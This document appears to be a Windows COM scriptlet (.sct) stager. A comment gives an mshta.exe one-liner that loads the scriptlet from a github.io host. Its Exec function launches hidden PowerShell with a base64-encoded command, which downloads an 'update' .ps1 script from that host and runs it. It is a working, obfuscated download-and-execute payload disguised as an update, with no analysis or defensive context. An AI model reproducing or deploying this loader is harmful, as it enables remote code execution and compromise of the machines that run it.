<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://hakkyahud.github.io/update.sct")).Exec();close(); -->

<registration
    description="HakkYahud"
    progid="HakkYahud"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run('powershell -noP -sta -w 1 -enc "SQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwBoAGEAawBrAHkAYQBoAHUAZAAuAGcAaQB0AGgAdQBiAC4AaQBvAC8AdQBwAGQAYQB0AGUAcwBfAEsAYgA2ADQAdQAwAHMAYQBrAGEALgBwAHMAMQAgAC0AbwAgAC4AXAB1AHAAZABhAHQAZQBzAF8ASwBiADYANAB1ADAAcwBhAGsAYQAuAHAAcwAxADsAJABrADMAYwBLAHUANwA1AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAuAFwAdQBwAGQAYQB0AGUAcwBfAEsAYgA2ADQAdQAwAHMAYQBrAGEALgBwAHMAMQApACkAOwBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAawAzAGMASwB1ADcANQApACkA"')
	}

]]>
</script>

</scriptlet>
